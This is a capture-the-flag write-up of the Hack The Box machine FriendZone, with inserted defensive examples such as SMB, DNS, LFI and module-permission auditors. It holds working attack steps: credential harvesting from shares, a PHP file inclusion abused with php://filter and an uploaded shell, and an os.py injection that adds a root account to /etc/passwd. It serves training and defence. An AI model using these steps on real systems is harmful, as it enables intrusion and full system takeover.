Welcome to the FriendZone writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


FriendZone

tags: HTB Easy Linux OSCP
Platform: Hackthebox
Difficulty: Easy
OS: Linux

Enumeration

Nmap

To get started, we run a quick scan for open ports.

$ nmap -p- -T4 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-16 18:23 CEST
Nmap scan report for 10.10.10.123
Host is up (0.094s latency).
Not shown: 65528 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
139/tcp open  netbios-ssn
443/tcp open  https
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 113.60 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 21,22,53,80,139,443,445 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-16 18:28 CEST
Nmap scan report for 10.10.10.123
Host is up (0.093s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 4.11 (93%), Linux 3.12 (93%), Linux 3.13 (93%), Linux 3.8 - 3.11 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -56m08s, deviation: 1h43m55s, median: 3m51s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2021-04-16T19:32:10+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-16T16:32:10
|_  start_date: N/A

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   93.22 ms 10.10.14.1
2   93.39 ms 10.10.10.123

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.38 seconds

SMB

The host also runs an SMB server; let's enumerate it for accessible shares and any files they contain.

$ smbclient -L 10.10.10.123
Enter WORKGROUP\root's password: 

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    Files           Disk      FriendZone Samba Server Files /etc/Files
    general         Disk      FriendZone Samba Server Files
    Development     Disk      FriendZone Samba Server Files
    IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

Within the general share we find some credentials.

$ smbclient //10.10.10.123/general
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 16 21:10:51 2019
  ..                                  D        0  Wed Jan 23 22:51:02 2019
  creds.txt                           N       57  Wed Oct 10 01:52:42 2018

        9221460 blocks of size 1024. 6460352 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
smb: \> exit
$ cat creds.txt
creds for the admin THING:

admin:WORKWORKHhallelujah@#

We also have write access to the Development share, so we can upload a PHP shell that may be useful later.

$ smbclient //10.10.10.123/Development
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> put shell.php
putting file shell.php as \shell.php (7,7 kb/s) (average 7,7 kb/s)
smb: \> ls
  .                                   D        0  Sat Apr 17 00:00:42 2021
  ..                                  D        0  Wed Jan 23 22:51:02 2019
  shell.php                           A     2233  Sat Apr 17 00:00:42 2021

        9221460 blocks of size 1024. 6178548 blocks available
smb: \>
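
The share listing above shows an anonymously writable share (Development) next to a readable one holding credentials (general). The following is an added example, not part of the original writeup, showing how an administrator can audit a smb.conf for exactly that pattern: shares that allow guest access and are writable. The configuration text is constructed to approximate the shares seen here (the real smb.conf was never retrieved; the /etc/general path and the guest settings are assumptions), and the parser relies on Samba's documented defaults ("read only = yes" unless "writable"/"writeable" overrides it, "guest ok"/"public" off by default).

```python
import configparser

# Constructed smb.conf fragment approximating the shares listed by smbclient -L.
# Paths other than /etc/Files and the guest settings are assumptions.
SAMPLE_SMB_CONF = """\
[global]
workgroup = WORKGROUP
map to guest = Bad User

[Files]
comment = FriendZone Samba Server Files /etc/Files
path = /etc/Files
browseable = yes
guest ok = no

[general]
comment = FriendZone Samba Server Files
path = /etc/general
guest ok = yes
read only = yes

[Development]
comment = FriendZone Samba Server Files
path = /etc/Development
guest ok = yes
writable = yes
"""

TRUE_VALUES = {"yes", "true", "1"}


def _flag(section, key, default):
    """Interpret a Samba boolean option, falling back to the documented default."""
    return section.get(key, default).strip().lower() in TRUE_VALUES


def share_is_writable(section):
    """'writable'/'writeable' are inverted synonyms of 'read only', which defaults to yes."""
    for key in ("writable", "writeable"):
        if key in section:
            return _flag(section, key, "no")
    return not _flag(section, "read only", "yes")


def guest_accessible(section):
    """'guest ok' (alias 'public') defaults to no."""
    for key in ("guest ok", "public"):
        if key in section:
            return _flag(section, key, "no")
    return False


def audit(conf_text):
    """Return (share, path, finding) for every share reachable without credentials."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(conf_text)
    findings = []
    for name in cp.sections():
        if name.lower() in ("global", "printers", "print$", "homes"):
            continue
        section = cp[name]
        guest, writable = guest_accessible(section), share_is_writable(section)
        if guest and writable:
            findings.append((name, section.get("path", ""), "guest-writable"))
        elif guest:
            findings.append((name, section.get("path", ""), "guest-readable"))
    return findings


if __name__ == "__main__":
    for share, path, finding in audit(SAMPLE_SMB_CONF):
        print("%-12s %-20s %s" % (share, path, finding))
```

A guest-writable share is the finding to act on first: anything dropped there is reachable by any local process, which is what the LFI later in this writeup turns into code execution. Run the same audit against /etc/samba/smb.conf on a real host by reading the file into audit().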

The Nmap results show the friendzone.red domain (in the TLS certificate), and on the website we can see another domain in the email address info@friendzoneportal.red.

friendzoneportal.red

DNS Enumeration

Let's see what subdomains it has.

$ dig @10.10.10.123 friendzoneportal.red axfr

; <<>> DiG 9.16.4-Debian <<>> @10.10.10.123 friendzoneportal.red axfr
; (1 server found)
;; global options: +cmd
friendzoneportal.red.   604800  IN  SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red.   604800  IN  AAAA    ::1
friendzoneportal.red.   604800  IN  NS  localhost.
friendzoneportal.red.   604800  IN  A   127.0.0.1
admin.friendzoneportal.red. 604800 IN   A   127.0.0.1
files.friendzoneportal.red. 604800 IN   A   127.0.0.1
imports.friendzoneportal.red. 604800 IN A   127.0.0.1
vpn.friendzoneportal.red. 604800 IN A   127.0.0.1
friendzoneportal.red.   604800  IN  SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 100 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: vie abr 16 23:30:02 CEST 2021
;; XFR size: 9 records (messages 1, bytes 309)

friendzone.red

DNS Enumeration

The machine has a working DNS server. Let's list the records of this domain with a zone transfer.

$ dig @10.10.10.123 friendzone.red axfr

; <<>> DiG 9.16.4-Debian <<>> @10.10.10.123 friendzone.red axfr
; (1 server found)
;; global options: +cmd
friendzone.red.     604800  IN  SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.     604800  IN  AAAA    ::1
friendzone.red.     604800  IN  NS  localhost.
friendzone.red.     604800  IN  A   127.0.0.1
administrator1.friendzone.red. 604800 IN A  127.0.0.1
hr.friendzone.red.  604800  IN  A   127.0.0.1
uploads.friendzone.red. 604800  IN  A   127.0.0.1
friendzone.red.     604800  IN  SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 96 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: vie abr 16 18:33:55 CEST 2021
;; XFR size: 8 records (messages 1, bytes 289)

We have several subdomains available; let's add them to /etc/hosts.
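
The two zone transfers above both succeeded, which is the real finding here: the server hands its whole zone to any client. As an added example (not part of the original writeup), the script below parses dig's AXFR output into records, collects the names that resolve, and builds the /etc/hosts line the text refers to. The sample input is the friendzone.red transfer shown above, embedded as a string; because the zone answers 127.0.0.1 for every name, the real target IP has to be supplied by the caller.

```python
import re

# Constructed sample: the friendzone.red AXFR output shown above, embedded inline.
SAMPLE_AXFR = """\
; <<>> DiG 9.16.4-Debian <<>> @10.10.10.123 friendzone.red axfr
; (1 server found)
;; global options: +cmd
friendzone.red.     604800  IN  SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.     604800  IN  AAAA    ::1
friendzone.red.     604800  IN  NS  localhost.
friendzone.red.     604800  IN  A   127.0.0.1
administrator1.friendzone.red. 604800 IN A  127.0.0.1
hr.friendzone.red.  604800  IN  A   127.0.0.1
uploads.friendzone.red. 604800  IN  A   127.0.0.1
friendzone.red.     604800  IN  SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 96 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
"""

# owner-name  TTL  IN  TYPE  RDATA  (dig's default presentation format)
RECORD_RE = re.compile(r"^(?P<name>\S+)\s+(?P<ttl>\d+)\s+IN\s+(?P<type>[A-Z]+)\s+(?P<data>.+)$")


def parse_axfr(text):
    """Return (name, type, rdata) tuples from dig AXFR output.
    Comment lines (starting with ';') are skipped and the trailing dot is removed."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RECORD_RE.match(line)
        if m:
            records.append((m.group("name").rstrip("."), m.group("type"), m.group("data").strip()))
    return records


def hostnames(records):
    """Unique names that carry an A or AAAA record, in first-seen order."""
    seen = []
    for name, rtype, _ in records:
        if rtype in ("A", "AAAA") and name not in seen:
            seen.append(name)
    return seen


def hosts_line(ip, records):
    """One /etc/hosts line mapping every discovered name to the target address."""
    return "%s %s" % (ip, " ".join(hostnames(records)))


if __name__ == "__main__":
    print(hosts_line("10.10.10.123", parse_axfr(SAMPLE_AXFR)))
```

On the server side the fix is to restrict transfers in BIND, for example with allow-transfer { none; }; in named.conf.options, or a list of the secondary servers that legitimately need the zone; a transfer that succeeds from an arbitrary client is what this parser would otherwise flag with a non-empty result.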

Recall that the general share gave us a creds.txt file with credentials for the user admin, which we can now try on these hosts.

administrator1.friendzone.red

Well, checking the subdomains found, I have seen that administrator1.friendzone.red over HTTPS shows us a login page.

We test the credentials obtained and they are correct!

Login Done ! visit /dashboard.php

It tells us that we can use the image_id and pagename parameters, so maybe we can upload an image or some other file; recall that there was a subdomain called uploads.friendzone.red.

Gobuster

Let's look for content on the website that could be useful as parameter values.

$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u https://administrator1.friendzone.red/ -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://administrator1.friendzone.red/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/04/16 19:07:20 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/images (Status: 301)
/server-status (Status: 403)
===============================================================
2021/04/16 19:10:35 Finished
===============================================================
$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u https://administrator1.friendzone.red/images/ -x jpg,png,jpeg -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://administrator1.friendzone.red/images/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     jpg,png,jpeg
[+] Timeout:        10s
===============================================================
2021/04/16 19:34:04 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.jpg (Status: 403)
/.htpasswd.png (Status: 403)
/.htpasswd.jpeg (Status: 403)
/.htaccess (Status: 403)
/.htaccess.jpg (Status: 403)
/.htaccess.png (Status: 403)
/.htaccess.jpeg (Status: 403)
/a.jpg (Status: 200)
/b.jpg (Status: 200)
Progress: 16426 / 20471 (80.24%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/04/16 19:44:29 Finished
===============================================================

Playing with the parameters, we can see that the pagename parameter (whose default value is timestamp) is an LFI with which we can read the content of files.

Accessing this URL we can see that the file has been included and the error message is shown. Let's try to read the source of dashboard.php using the php://filter/convert.base64-encode/resource= wrapper.

<?php
    //echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
    //echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";
    echo "<title>FriendZone Admin !</title>";
    $auth = $_COOKIE["FriendZoneAuth"];

    if ($auth === "e7749d0f4b4da5d03e6e9196fd1d18f1"){
        echo "<br><br><br>";

        echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
        echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";

        if(!isset($_GET["image_id"])){
          echo "<br><br>";
          echo "<center><p>image_name param is missed !</p></center>";
          echo "<center><p>please enter it to show the image</p></center>";
          echo "<center><p>default is image_id=a.jpg&pagename=timestamp</p></center>";
        }else{
             $image = $_GET["image_id"];
             echo "<center><img src='images/$image'></center>";

             echo "<center><h1>Something went worng ! , the script include wrong param !</h1></center>";
             include($_GET["pagename"].".php");
             //echo $_GET["pagename"];
        }
    }else{
        echo "<center><p>You can't see the content ! , please login !</center></p>";
    }
?>

Indeed, as we can see, it includes any file whose path we pass in pagename, appending .php to the end.
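
The root cause in dashboard.php is include($_GET["pagename"].".php"): a user-controlled string reaches include(), so path components and PHP stream wrappers such as php://filter are honoured. As an added example (not code from the original writeup or from the box), the Python below shows the allowlist approach that fixes this class of bug, and a small detector that flags the abusive requests in web server logs. The allowlist entries, the /var/www/admin path and the log lines are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Pages dashboard.php is allowed to include (assumed names; the application only
# documents the default "timestamp").
ALLOWED_PAGES = {"timestamp", "gallery"}


def resolve_page(pagename):
    """Hardened replacement for include($_GET['pagename'].'.php'): the parameter
    selects one of a fixed set of files and is never used as a path."""
    if pagename in ALLOWED_PAGES:
        return "/var/www/admin/" + pagename + ".php"   # assumed location
    return None  # unknown page: include nothing


# Apache combined/common log prefix: ip ident user [time] "METHOD target proto" status
APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)
# Anything that looks like a path, a traversal, a stream wrapper or a NUL byte.
SUSPICIOUS = re.compile(r"(\.\.|/|://|\x00)")


def inspect_request(line):
    """Return (client_ip, pagename) when the request carries a pagename that is
    off the allowlist or looks like a path/wrapper, otherwise None."""
    m = APACHE_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    for value in parse_qs(query, keep_blank_values=True).get("pagename", []):
        value = unquote(value)  # parse_qs decoded once; this catches double encoding
        if value not in ALLOWED_PAGES or SUSPICIOUS.search(value):
            return (m.group("ip"), value)
    return None


def scan(lines):
    """Run inspect_request over a log and keep only the hits."""
    return [hit for hit in (inspect_request(l) for l in lines) if hit]


# Constructed log lines modelled on the requests made in this writeup.
SAMPLE_LOG = [
    '10.10.14.3 - - [16/Apr/2021:23:40:01 +0300] "GET /dashboard.php?image_id=a.jpg&pagename=timestamp HTTP/1.1" 200 1337',
    '10.10.14.3 - - [16/Apr/2021:23:41:10 +0300] "GET /dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard HTTP/1.1" 200 4211',
    '10.10.14.3 - - [16/Apr/2021:23:42:55 +0300] "GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell HTTP/1.1" 200 0',
    '10.10.14.3 - - [16/Apr/2021:23:43:30 +0300] "GET /dashboard.php?image_id=a.jpg&pagename=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print("%s pagename=%r" % (ip, value))
```

The allowlist is the fix; the log check is the compensating control while the fix is rolled out. Note that the php://filter read returns a 200 just like the legitimate request, so status-code monitoring alone would not have caught the source disclosure.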

Recall that at the start we uploaded a PHP shell to the Development share. We do not know where it is on disk, but the comment on the Files share gives its location as /etc/Files, so we can guess that Development lives at /etc/Development. Let's start a listener in a terminal and reach our shell through the LFI.

Exploitation

Now we access https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell, with the pagename parameter pointing at the path of our uploaded shell (the include appends the .php extension), and we get our shell.

$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.123] 38554
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 00:54:54 up  5:28,  0 users,  load average: 0.00, 0.00, 0.11
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (515): Inappropriate ioctl for device
bash: no job control in this shell
www-data@FriendZone:/$

And now, inside /home/friend we can read the user flag.

www-data@FriendZone:/home/friend$ cat user.txt 
CENSORED_FLAG

Post exploitation

Privilege escalation: www-data to friend

Inside the /var/www directory we find the file mysql_data.conf, which contains MySQL credentials that will help us escalate to the friend user.

www-data@FriendZone:/var/www$ cat mysql_data.conf 
for development process this is the mysql creds for user friend

db_user=friend

db_pass=Agpyu12!0.213$

db_name=FZ

And now, let's connect with SSH!

$ ssh friend@10.10.10.123
The authenticity of host '10.10.10.123 (10.10.10.123)' can't be established.
ECDSA key fingerprint is SHA256:/CZVUU5zAwPEcbKUWZ5tCtCrEemowPRMQo5yRXTWxgw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.123' (ECDSA) to the list of known hosts.
friend@10.10.10.123's password: 
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$

Privilege escalation: friend to root

Pspy

Running pspy to monitor process creation, we see root executing /opt/server_admin/reporter.py:

2021/04/17 01:58:01 CMD: UID=0    PID=17217  | /usr/bin/python /opt/server_admin/reporter.py 
2021/04/17 01:58:01 CMD: UID=0    PID=17216  | /bin/sh -c /opt/server_admin/reporter.py

reporter.py

#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer

Looking at the script, we can see that it does nothing except print a message, but it imports the os library. If we list the permissions of that library we can see that we have permission to edit it, so we can inject into it code (for example a reverse shell) that will be executed as root when cron launches reporter.py.

friend@FriendZone:~$ ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15  2019 /usr/lib/python2.7/os.py
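
A world-writable file in the standard library is the whole privilege escalation: every root process that imports os runs whatever was written there. As an added example (not from the original writeup), the following audit walks Python's module search path and reports .py files that are group- or world-writable, or not owned by the expected user; the demo builds a constructed temporary library tree containing an os.py with mode 777, as found on the box, next to a correctly protected module. The directory layout and file contents in the demo are constructed, not copied from the target.

```python
import os
import stat
import sys
import tempfile


def writable_modules(search_path, allowed_owner_uid=0):
    """Return (path, mode, uid) for every .py file under the given directories that
    is group/world-writable or not owned by allowed_owner_uid. Symlinks are skipped
    so a link's own permissions do not produce a false positive."""
    findings = []
    for base in search_path:
        if not base or not os.path.isdir(base):
            continue
        for root, _dirs, files in os.walk(base):
            for name in files:
                if not name.endswith(".py"):
                    continue
                path = os.path.join(root, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISLNK(st.st_mode):
                    continue
                loose = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
                if loose or st.st_uid != allowed_owner_uid:
                    findings.append((path, oct(stat.S_IMODE(st.st_mode)), st.st_uid))
    return findings


def demo():
    """Constructed library tree: an os.py chmod 777 (as on the box) beside a
    properly protected module. Returns the audit findings for that tree."""
    lib = os.path.join(tempfile.mkdtemp(), "python2.7")
    os.makedirs(lib)
    bad = os.path.join(lib, "os.py")
    good = os.path.join(lib, "stat.py")
    for path in (bad, good):
        with open(path, "w") as fh:
            fh.write("# placeholder module body\n")
    os.chmod(bad, 0o777)
    os.chmod(good, 0o644)
    # the demo runs as an unprivileged user, so treat that user as the expected owner
    return writable_modules([lib], allowed_owner_uid=os.getuid())


if __name__ == "__main__":
    # Real use: audit the interpreter's own search path, expecting root ownership.
    for path, mode, uid in writable_modules(sys.path, 0) or demo():
        print("%s %s uid=%d" % (mode, path, uid))
```

On a real system run writable_modules(sys.path, 0) with the interpreter that the cron job uses (here /usr/bin/python, i.e. Python 2.7 on this box) so the same module directories are checked; a loose directory mode on the library path should be treated the same way, since it allows files to be replaced rather than edited.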

Exploitation

We are going to add the following lines to the os.py library so that a user with root privileges (UID 0) is appended to the /etc/passwd file.

passwd = open('/etc/passwd', 'r').readlines()

# append the entry only once (the cron job re-runs this) and terminate it with a newline
if not any('x4v1l0k' in s for s in passwd):
    output = open('/etc/passwd', 'a')
    output.write('x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash\n')
    output.close()

Now we just have to wait for the task to run... and we will be root!

friend@FriendZone:~$ su x4v1l0k
Password: 
root@FriendZone:/home/friend# id
uid=0(root) gid=0(root) groups=0(root)
root@FriendZone:/home/friend# cat /root/root.txt
CENSORED_FLAG